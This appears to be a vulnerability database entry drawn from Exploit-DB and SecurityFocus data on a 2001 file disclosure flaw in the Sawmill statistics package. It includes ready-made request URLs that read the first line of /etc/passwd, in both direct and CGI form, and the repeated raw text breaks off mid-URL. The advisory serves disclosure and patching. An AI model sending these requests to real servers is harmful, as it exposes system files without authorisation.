Sawmill Arbitrary File Disclosure Vulnerability

vendor:

Sawmill

by:

SecurityFocus

7.5

CVSS

HIGH

Arbitrary File Disclosure

200

CWE

Product Name: Sawmill

Affected Version From: All versions

Affected Version To: All versions

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Unix, Windows and Mac OS

2001

Sawmill Arbitrary File Disclosure Vulnerability

A specially crafted request can disclose the first line of any world readable file for which the full pathname is known, for example /etc/passwd. The output of the request is similar to the following: 'Unknown configuration command "root:x:0:0:root:/root:/bin/sh" in "/etc/passwd".' The following request will display the first line of /etc/passwd: http://target:port/sawmill?rfcf+%22/etc/passwd%22+spbn+1,1,21,1,1,1,1,1,1,1,1,1+3. If sawmill is run as a cgi script, the following can be used instead: http://target/cgi-bin/sawmill5?rfcf+%22/etc/passwd%22+spbn+1,1,21,1,1,1,1,1,1,1,1,1+3.

Mitigation:

Upgrade to the latest version of Sawmill.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/1402/info

Sawmill is a site statistics package for Unix, Windows and Mac OS. A specially crafted request can disclose the first line of any world readable file for which the full pathname is known, for example /etc/passwd. The output of the request is similar to the following: 'Unknown configuration command "root:x:0:0:root:/root:/bin/sh" in "/etc/passwd".' 

The following request will display the first line of /etc/passwd

http://target:port/sawmill?rfcf+%22/etc/passwd%22+spbn+1,1,21,1,1,1,1,1,1,1,1,1+3

If sawmill is run as a cgi script, the following can be used instead:

http://target/cgi-bin/sawmill5?rfcf+%22/etc/passwd%22+spbn+1,1,21,1,1,1,1